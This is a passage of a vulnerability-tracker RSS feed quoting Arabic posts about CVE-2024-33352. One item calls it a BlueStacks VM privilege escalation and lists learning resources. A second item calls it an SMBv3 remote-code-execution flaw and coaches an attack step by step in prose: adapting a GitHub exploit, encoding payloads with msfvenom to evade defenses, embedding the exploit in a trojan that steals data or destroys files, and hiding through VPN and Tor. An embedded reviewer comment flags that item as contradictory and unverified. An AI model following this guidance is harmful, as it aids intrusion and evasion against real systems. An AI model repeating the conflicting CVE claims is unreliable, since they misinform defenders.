\u0623\u0645\u0627\u0646 \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a. 
\u064a\u0648\u0641\u0631 \u0642\u0648\u0627\u0626\u0645 \u0648\u062b\u0627\u0626\u0642\u064a\u0629 \u0648\u0623\u062f\u0648\u0627\u062a \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627 \u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629.\n  - [\u0631\u0627\u0628\u0637 \u0627\u0644\u0645\u0648\u0642\u0639](https://owasp.org/)\n\n- Hack The Box:\n  - \u0645\u0646\u0635\u0629 \u062a\u0641\u0627\u0639\u0644\u064a\u0629 \u062a\u0648\u0641\u0631 \u0628\u064a\u0626\u0629 \u0644\u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0648\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0641\u064a \u0623\u0646\u0638\u0645\u0629 \u062d\u0642\u064a\u0642\u064a\u0629.\n  - [\u0631\u0627\u0628\u0637 \u0627\u0644\u0645\u0648\u0642\u0639](https://www.hackthebox.com/)\n\n- SecurityTube:\n  - \u0645\u0643\u062a\u0628\u0629 \u0641\u064a\u062f\u064a\u0648\u0647\u0627\u062a \u062a\u0639\u0644\u064a\u0645\u064a\u0629 \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0627\u0644\u0639\u062f\u064a\u062f \u0645\u0646 \u0627\u0644\u062f\u0631\u0648\u0633 \u0648\u0627\u0644\u0645\u062d\u0627\u0636\u0631\u0627\u062a \u062d\u0648\u0644 \u0623\u0645\u0646 \u0627\u0644\u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0648\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a.\n  - [\u0631\u0627\u0628\u0637 \u0627\u0644\u0645\u0648\u0642\u0639](http://www.securitytube.net/)\n\n- \u0643\u062a\u0627\u0628 \"The Web Application Hacker's Handbook\":\n  - \u0643\u062a\u0627\u0628 \u0645\u0645\u064a\u0632 \u064a\u062a\u0646\u0627\u0648\u0644 \u0628\u0627\u0644\u062a\u0641\u0635\u064a\u0644 \u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u062a\u0637\u0628\u064a\u0642\u0627\u062a 
\u0627\u0644\u0648\u064a\u0628 \u0648\u0643\u064a\u0641\u064a\u0629 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627.\n  - [\u0631\u0627\u0628\u0637 \u0627\u0644\u0643\u062a\u0627\u0628 \u0639\u0644\u0649 \u0623\u0645\u0627\u0632\u0648\u0646](https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470)\n\nThe Smart Shadow:\n\u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0641\u064a BlueStacks (\u0645\u062d\u0627\u0643\u064a \u0627\u0644\u0623\u0646\u062f\u0631\u0648\u064a\u062f) \u0648\u0627\u0644\u062a\u064a \u062a\u0639\u062a\u0645\u062f \u0639\u0644\u0649 \u0627\u0644\u062a\u0633\u0644\u0644 \u0645\u0646 \u062e\u0644\u0627\u0644 \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a \u0644\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 (CVE-2024-33352) \n\n---\n\n\u0634\u0631\u062d \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352 \u0641\u064a BlueStacks\n\n\u0645\u0642\u062f\u0645\u0629:\nBlueStacks \u0647\u0648 \u0645\u062d\u0627\u0643\u064a \u0623\u0646\u062f\u0631\u0648\u064a\u062f \u064a\u0633\u062a\u062e\u062f\u0645 \u0644\u062a\u0634\u063a\u064a\u0644 \u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0639\u0644\u0649 \u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631. 
\u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u062e\u0637\u064a\u0631\u0629 \u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u0645\u062d\u0627\u0643\u064a \u062a\u062a\u064a\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0639\u0628\u0631 \u0627\u0644\u062a\u0633\u0644\u0644 \u0645\u0646 \u062e\u0644\u0627\u0644 \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a \u0644\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629.\n\n\u0645\u0627 \u0647\u064a \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352\u061f\n\nCVE-2024-33352 \u0647\u064a \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641\u0647\u0627 \u0641\u064a BlueStacks\u060c \u062a\u062a\u064a\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a (Privilege Escalation) \u0645\u0646 \u062e\u0644\u0627\u0644 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a \u0644\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 (VM backdooring). 
\u0647\u0630\u0627 \u064a\u0639\u0646\u064a \u0623\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u064a\u0645\u0643\u0646\u0647 \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0623\u0639\u0644\u0649 \u0645\u0645\u0627 \u0647\u0648 \u0645\u0633\u0645\u0648\u062d \u0644\u0647\u060c \u0645\u0645\u0627 \u064a\u0645\u0643\u0646\u0647 \u0645\u0646 \u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 \u0636\u0627\u0631\u0629 \u0623\u0648 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0628\u064a\u0627\u0646\u0627\u062a \u062d\u0633\u0627\u0633\u0629.\n\n\u0643\u064a\u0641 \u062a\u0639\u0645\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629\u061f\n\n1. \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a \u0644\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 (VM backdooring):\n   - \u062a\u0633\u062a\u062e\u062f\u0645 BlueStacks \u062a\u0642\u0646\u064a\u0629 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 \u0644\u062a\u0634\u063a\u064a\u0644 \u0646\u0638\u0627\u0645 \u0627\u0644\u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631. \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0647\u0630\u0647 \u0627\u0644\u0628\u064a\u0626\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 \u0644\u0625\u062f\u062e\u0627\u0644 \u0643\u0648\u062f \u0636\u0627\u0631 (malicious code) \u062f\u0627\u062e\u0644 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629.\n   \n2. 
\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a (Privilege Escalation):\n   - \u0628\u0639\u062f \u0625\u062f\u062e\u0627\u0644 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631\u060c \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u062a\u0635\u0639\u064a\u062f \u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a\u0647 \u062f\u0627\u062e\u0644 \u0627\u0644\u0646\u0638\u0627\u0645. \u0647\u0630\u0627 \u064a\u0639\u0646\u064a \u0623\u0646\u0647 \u064a\u0645\u0643\u0646\u0647 \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0623\u0639\u0644\u0649 \u0645\u062b\u0644 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0645\u062f\u064a\u0631 (Administrator privileges)\u060c \u0645\u0645\u0627 \u064a\u062a\u064a\u062d \u0644\u0647 \u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 \u0636\u0627\u0631\u0629 \u0623\u0648 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u062d\u0633\u0627\u0633\u0629.\n\n\u0645\u062b\u0627\u0644 \u0639\u0645\u0644\u064a:\n\n\u0644\u0646\u0641\u062a\u0631\u0636 \u0623\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0644\u062f\u064a\u0647 \u0648\u0635\u0648\u0644 \u0645\u062d\u062f\u0648\u062f \u0625\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631 \u0627\u0644\u0630\u064a \u064a\u0639\u0645\u0644 \u0639\u0644\u064a\u0647 BlueStacks. \u064a\u0645\u0643\u0646\u0647 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352 \u0628\u0627\u0644\u0637\u0631\u064a\u0642\u0629 \u0627\u0644\u062a\u0627\u0644\u064a\u0629:\n\n1. 
\u0625\u062f\u062e\u0627\u0644 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631:\n   - \u064a\u0642\u0648\u0645 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u0625\u062f\u062e\u0627\u0644 \u0643\u0648\u062f \u0636\u0627\u0631 \u062f\u0627\u062e\u0644 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 \u0644\u0640 BlueStacks. \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u062d\u062f\u062b \u0630\u0644\u0643 \u0645\u0646 \u062e\u0644\u0627\u0644 \u062a\u0646\u0632\u064a\u0644 \u062a\u0637\u0628\u064a\u0642 \u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0636\u0627\u0631 \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u062e\u0628\u064a\u062b.\n\n2. \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631:\n   - \u0639\u0646\u062f \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u0636\u0627\u0631 \u062f\u0627\u062e\u0644 BlueStacks\u060c \u064a\u062a\u0645 \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631 \u062f\u0627\u062e\u0644 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629.", "creation_timestamp": "2024-12-13T19:00:22.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/8454b4dd-4ecc-4d1a-8559-383b31fe5e09/export</guid>
      <pubDate>Fri, 13 Dec 2024 19:00:22 +0000</pubDate>
    </item>
    <item>
      <!-- Reviewer note: the "content" field of this sighting is text attributed to the
           Telegram source in "source"; it is not a verified analysis. It describes
           CVE-2024-33352 as an SMBv3 remote code execution flaw, whereas the other
           sightings in this feed for the same CVE describe a BlueStacks (Android
           emulator) privilege escalation. Treat the "published-proof-of-concept" type
           as unconfirmed and check the CVE record before relying on this entry. -->
      <title>2d520f7b-8c6c-4312-a64a-5f06aabd0211</title>
      <link>https://vulnerability.circl.lu/sighting/2d520f7b-8c6c-4312-a64a-5f06aabd0211/export</link>
      <description>{"uuid": "2d520f7b-8c6c-4312-a64a-5f06aabd0211", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/3542", "content": "CVE-2024-33352 \u0647\u0648 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u062e\u0637\u064a\u0631\u0629 \u0641\u064a \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SMBv3 \u0648\u062f\u064a \u0628\u062a\u0623\u062b\u0631 \u0639\u0644\u0649 \u0643\u0644 \u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0644\u064a \u0628\u062a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u062f\u0647 \u0632\u064a Windows \u0648\u0628\u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0646\u0647 \u064a\u0646\u0641\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0639\u0646 \u0628\u064f\u0639\u062f \u0648\u064a\u0633\u064a\u0637\u0631 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641. 
\u0627\u0644\u0637\u0631\u064a\u0642\u0629 \u0627\u0644\u0623\u0633\u0627\u0633\u064a\u0629 \u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0647\u064a \u0639\u0646 \u0637\u0631\u064a\u0642 \u0625\u0631\u0633\u0627\u0644 \u062d\u0632\u0645 \u0628\u064a\u0627\u0646\u0627\u062a \u0645\u0639\u064a\u0646\u0629 \u062a\u0645 \u062a\u0643\u0648\u064a\u0646\u0647\u0627 \u0628\u0634\u0643\u0644 \u062e\u0627\u0635 \u0644\u0644\u0633\u064a\u0631\u0641\u0631 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0627\u0644\u0644\u064a \u0628\u064a\u0634\u063a\u0644 \u062e\u062f\u0645\u0629 SMB \u0648\u0628\u064a\u0643\u0648\u0646 \u0627\u0644\u0647\u062f\u0641 \u0625\u0646 \u0627\u0644\u062d\u0632\u0645 \u062f\u064a \u062a\u062e\u0644\u064a \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u064a\u0642\u0631\u0623 \u0628\u064a\u0627\u0646\u0627\u062a \u063a\u064a\u0631 \u0635\u062d\u064a\u062d\u0629 \u0648\u064a\u0628\u062f\u0623 \u064a\u0646\u0641\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u062e\u0628\u064a\u062b\u0629.\n\n\u0639\u0644\u0634\u0627\u0646 \u062a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0641\u064a \u0647\u062c\u0648\u0645 \u0623\u0648 \u062a\u0636\u064a\u0641\u0647\u0627 \u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a \u062e\u0628\u064a\u062b\u0629 \u0632\u064a \u0627\u0644\u0645\u0627\u0644\u0648\u064a\u0631\u060c \u0623\u0648\u0644 \u062d\u0627\u062c\u0629 \u0644\u0627\u0632\u0645 \u062a\u0639\u0645\u0644\u0647\u0627 \u0647\u064a \u0625\u0646\u0643 \u062a\u062c\u0647\u0632 \u062d\u0632\u0645 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u062e\u0627\u0635\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0648\u062f\u064a \u0628\u062a\u0643\u0648\u0646 \u0639\u0628\u0627\u0631\u0629 \u0639\u0646 \u0633\u0644\u0633\u0644\u0629 \u0645\u0646 
\u0627\u0644\u0623\u0648\u0627\u0645\u0631 \u0648\u0627\u0644\u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0627\u0644\u0644\u064a \u0628\u062a\u062a\u0648\u0627\u0641\u0642 \u0645\u0639 \u0627\u0644\u0634\u0631\u0648\u0637 \u0627\u0644\u0645\u062d\u062f\u062f\u0629 \u0644\u0644\u062b\u063a\u0631\u0629 \u0644\u0627\u0632\u0645 \u062a\u062a\u0623\u0643\u062f \u0625\u0646 \u0627\u0644\u062d\u0632\u0645 \u062f\u064a \u0645\u0635\u0645\u0645\u0629 \u0628\u0637\u0631\u064a\u0642\u0629 \u062a\u062e\u0644\u064a \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u064a\u0642\u0631\u0623\u0647\u0627 \u0643\u0628\u064a\u0627\u0646\u0627\u062a \u0633\u0644\u064a\u0645\u0629 \u0641\u064a \u0627\u0644\u0628\u062f\u0627\u064a\u0629 \u0648\u0628\u0639\u062f \u0643\u062f\u0647 \u064a\u0646\u0641\u0630 \u0627\u0644\u0623\u0648\u0627\u0645\u0631 \u0627\u0644\u0644\u064a \u0641\u064a\u0647\u0627 \u0641\u064a \u0627\u0644\u062e\u0637\u0648\u0627\u062a \u062f\u064a \u0647\u0646\u0648\u0636\u062d \u0625\u0632\u0627\u064a \u062a\u0642\u062f\u0631 \u062a\u0646\u0641\u0630 \u0627\u0644\u0647\u062c\u0648\u0645 \u0628\u0634\u0643\u0644 \u0639\u0644\u0645\u064a \u0648\u062f\u0642\u064a\u0642.\n\n\u0623\u0648\u0644\u0627\u064b\u060c \u0647\u062a\u0628\u062f\u0623 \u0628\u062a\u062d\u0644\u064a\u0644 \u0643\u0648\u062f \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0645\u0648\u062c\u0648\u062f \u0639\u0644\u0649 GitHub \u0648\u062a\u0641\u0647\u0645 \u0643\u0648\u064a\u0633 \u0625\u0632\u0627\u064a \u0628\u064a\u0634\u062a\u063a\u0644 \u0627\u0644\u062c\u0632\u0621 \u0627\u0644\u062e\u0627\u0635 \u0628\u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u062d\u0632\u0645 \u0648\u0647\u0646\u0627 \u0644\u0627\u0632\u0645 \u062a\u0633\u062a\u062e\u062f\u0645 \u0623\u062f\u0648\u0627\u062a \u062a\u062d\u0644\u064a\u0644 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0632\u064a Wireshark \u0639\u0644\u0634\u0627\u0646 \u062a\u0631\u0627\u0642\u0628 \u062d\u0631\u0643\u0629 
\u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0648\u062a\u0641\u0647\u0645 \u0625\u0632\u0627\u064a \u0627\u0644\u062d\u0632\u0645 \u0628\u062a\u062a\u0628\u0627\u062f\u0644 \u0628\u064a\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0648\u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0648\u062f\u0647 \u0647\u064a\u0633\u0627\u0639\u062f\u0643 \u062a\u0643\u062a\u0634\u0641 \u0627\u0644\u0646\u0642\u0627\u0637 \u0627\u0644\u0636\u0639\u064a\u0641\u0629 \u0641\u064a \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644. \u0628\u0639\u062f \u0643\u062f\u0647 \u0647\u062a\u0628\u062f\u0623 \u0641\u064a \u0625\u0639\u062f\u0627\u062f \u0643\u0648\u062f \u0627\u0644\u0628\u0631\u0645\u062c\u0629 \u0627\u0644\u062e\u0627\u0635 \u0628\u064a\u0643 \u0639\u0644\u0634\u0627\u0646 \u062a\u0628\u0639\u062a \u0627\u0644\u062d\u0632\u0645 \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0644\u0644\u0633\u064a\u0631\u0641\u0631 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0648\u062f\u0647 \u0645\u0645\u0643\u0646 \u062a\u0639\u0645\u0644\u0647 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0644\u063a\u0627\u062a \u0628\u0631\u0645\u062c\u0629 \u0632\u064a Python \u0623\u0648 C++ \u0648\u062f\u064a \u0644\u063a\u0627\u062a \u0642\u0648\u064a\u0629 \u0648\u062a\u0642\u062f\u0631 \u062a\u0643\u062a\u0628 \u0628\u064a\u0647\u0627 \u0623\u0643\u0648\u0627\u062f \u0628\u062a\u0646\u0641\u0630 \u0623\u0648\u0627\u0645\u0631 \u0645\u0639\u0642\u062f\u0629.\n\n\u062b\u0627\u0646\u064a\u0627\u064b\u060c \u0644\u0627\u0632\u0645 \u062a\u062e\u062a\u0627\u0631 \u0627\u0644\u0647\u062f\u0641 \u0628\u062a\u0627\u0639\u0643 \u0628\u0639\u0646\u0627\u064a\u0629 \u0648\u062f\u0647 \u0628\u064a\u0643\u0648\u0646 \u0633\u064a\u0631\u0641\u0631 \u0628\u064a\u0634\u063a\u0644 \u062e\u062f\u0645\u0629 SMBv3 \u0648\u0639\u0644\u064a\u0647 \u0646\u0638\u0627\u0645 \u062a\u0634\u063a\u064a\u0644 \u0642\u0627\u0628\u0644 \u0644\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 
\u0648\u0645\u0646 \u0627\u0644\u0645\u0647\u0645 \u0625\u0646\u0643 \u062a\u0643\u0648\u0646 \u0645\u062c\u0647\u0632 \u0628\u064a\u0626\u0629 \u0627\u062e\u062a\u0628\u0627\u0631 \u0622\u0645\u0646\u0629 \u0639\u0644\u0634\u0627\u0646 \u062a\u062c\u0631\u0628 \u0639\u0644\u064a\u0647\u0627 \u0627\u0644\u0647\u062c\u0648\u0645 \u0642\u0628\u0644 \u0645\u0627 \u062a\u0646\u0641\u0630\u0647 \u0641\u064a \u0627\u0644\u0628\u064a\u0626\u0629 \u0627\u0644\u062d\u0642\u064a\u0642\u064a\u0629 \u0648\u062a\u0642\u062f\u0631 \u062a\u0633\u062a\u062e\u062f\u0645 \u0623\u062f\u0648\u0627\u062a \u0632\u064a Metasploit Framework \u0639\u0644\u0634\u0627\u0646 \u062a\u062e\u062a\u0628\u0631 \u0627\u0644\u062b\u063a\u0631\u0629 \u0648\u062a\u0639\u062f\u0644 \u0639\u0644\u0649 \u0627\u0644\u0623\u0643\u0648\u0627\u062f \u0628\u062a\u0627\u0639\u062a\u0643 \u0648\u062a\u062a\u0627\u0643\u062f \u0625\u0646\u0647\u0627 \u0628\u062a\u0634\u062a\u063a\u0644 \u0628\u0634\u0643\u0644 \u0635\u062d\u064a\u062d.\n\n\u062b\u0627\u0644\u062b\u0627\u064b\u060c \u0644\u0627\u0632\u0645 \u062a\u0636\u064a\u0641 \u0628\u0639\u0636 \u0627\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u0625\u0636\u0627\u0641\u064a\u0629 \u0644\u062a\u062d\u0633\u064a\u0646 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0648\u062f\u0647 \u0628\u064a\u0634\u0645\u0644 \u062a\u0634\u0641\u064a\u0631 \u0627\u0644\u062d\u0632\u0645 \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0628\u0637\u0631\u064a\u0642\u0629 \u062a\u062e\u0644\u064a \u0627\u0643\u062a\u0634\u0627\u0641\u0647\u0627 \u0623\u0635\u0639\u0628 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0623\u062f\u0648\u0627\u062a \u0632\u064a Msfvenom \u0645\u0645\u0643\u0646 \u062a\u0636\u064a\u0641 \u0623\u0643\u0648\u0627\u062f \u062a\u0634\u0641\u064a\u0631 \u0644\u0644\u0623\u0648\u0627\u0645\u0631 \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0639\u0644\u0634\u0627\u0646 \u062a\u0639\u062f\u064a \u0645\u0646 
\u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u062d\u0645\u0627\u064a\u0629.\n\n\u0645\u0646 \u0636\u0645\u0646 \u0627\u0644\u062a\u062d\u0633\u064a\u0646\u0627\u062a \u0627\u0644\u0645\u0645\u0643\u0646\u0629 \u0647\u064a \u0625\u0646\u0643 \u062a\u062f\u0645\u062c \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0641\u064a \u0645\u0627\u0644\u0648\u064a\u0631 \u0623\u0643\u0628\u0631 \u064a\u0639\u0646\u064a \u0645\u062b\u0644\u0627\u064b \u062a\u0642\u062f\u0631 \u062a\u0639\u0645\u0644 \u062d\u0635\u0627\u0646 \u0637\u0631\u0648\u0627\u062f\u0629 (Trojan Horse) \u0628\u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0639\u0644\u0634\u0627\u0646 \u064a\u062f\u062e\u0644 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0648\u0628\u0639\u062f \u0643\u062f\u0647 \u064a\u0646\u0641\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u062e\u0628\u064a\u062b\u0629 \u0632\u064a \u0633\u0631\u0642\u0629 \u0628\u064a\u0627\u0646\u0627\u062a \u0623\u0648 \u062a\u062f\u0645\u064a\u0631 \u0645\u0644\u0641\u0627\u062a \u0623\u0648 \u062d\u062a\u0649 \u062a\u062d\u0645\u064a\u0644 \u0645\u0627\u0644\u0648\u064a\u0631 \u0625\u0636\u0627\u0641\u064a. 
\u0648\u0623\u062e\u064a\u0631\u0627\u064b \u0644\u0627\u0632\u0645 \u062a\u0643\u0648\u0646 \u062d\u0631\u064a\u0635 \u062c\u062f\u0627\u064b \u0648\u062a\u0627\u062e\u062f \u0643\u0644 \u0627\u062d\u062a\u064a\u0627\u0637\u0627\u062a\u0643 \u0639\u0644\u0634\u0627\u0646 \u0645\u062a\u062a\u0639\u0631\u0636\u0634 \u0644\u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u0623\u0648 \u0627\u0644\u062a\u0639\u0642\u0628 \u064a\u0639\u0646\u064a \u0644\u0627\u0632\u0645 \u062a\u0633\u062a\u062e\u062f\u0645 \u0634\u0628\u0643\u0629 \u0648\u0647\u0645\u064a\u0629 (VPN) \u0648\u062a\u063a\u064a\u0631 \u0645\u0648\u0642\u0639\u0643 \u0628\u0627\u0633\u062a\u0645\u0631\u0627\u0631 \u0648\u062a\u0633\u062a\u062e\u062f\u0645 \u0623\u062f\u0648\u0627\u062a \u0625\u062e\u0641\u0627\u0621 \u0627\u0644\u0647\u0648\u064a\u0629 \u0632\u064a Tor.\n\n\u0644\u0627\u0632\u0645 \u062a\u0639\u0631\u0641 \u0625\u0646 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u062e\u0637\u064a\u0631\u0629 \u062c\u062f\u0627\u064b \u0648\u0644\u0648 \u062a\u0645 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627 \u0628\u0634\u0643\u0644 \u0635\u062d\u064a\u062d \u0645\u0645\u0643\u0646 \u062a\u0633\u0628\u0628 \u0623\u0636\u0631\u0627\u0631 \u0643\u0628\u064a\u0631\u0629 \u062c\u062f\u0627\u064b \u0644\u0623\u064a \u0646\u0638\u0627\u0645 \u0639\u0644\u0634\u0627\u0646 \u0643\u062f\u0647 \u0627\u0644\u0634\u0631\u0643\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0628\u062a\u0646\u0635\u062d \u0628\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0628\u0627\u0633\u062a\u0645\u0631\u0627\u0631 \u0648\u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u0628\u0627\u062a\u0634\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u0646\u0632\u0644\u0647\u0627 \u0627\u0644\u0634\u0631\u0643\u0627\u062a 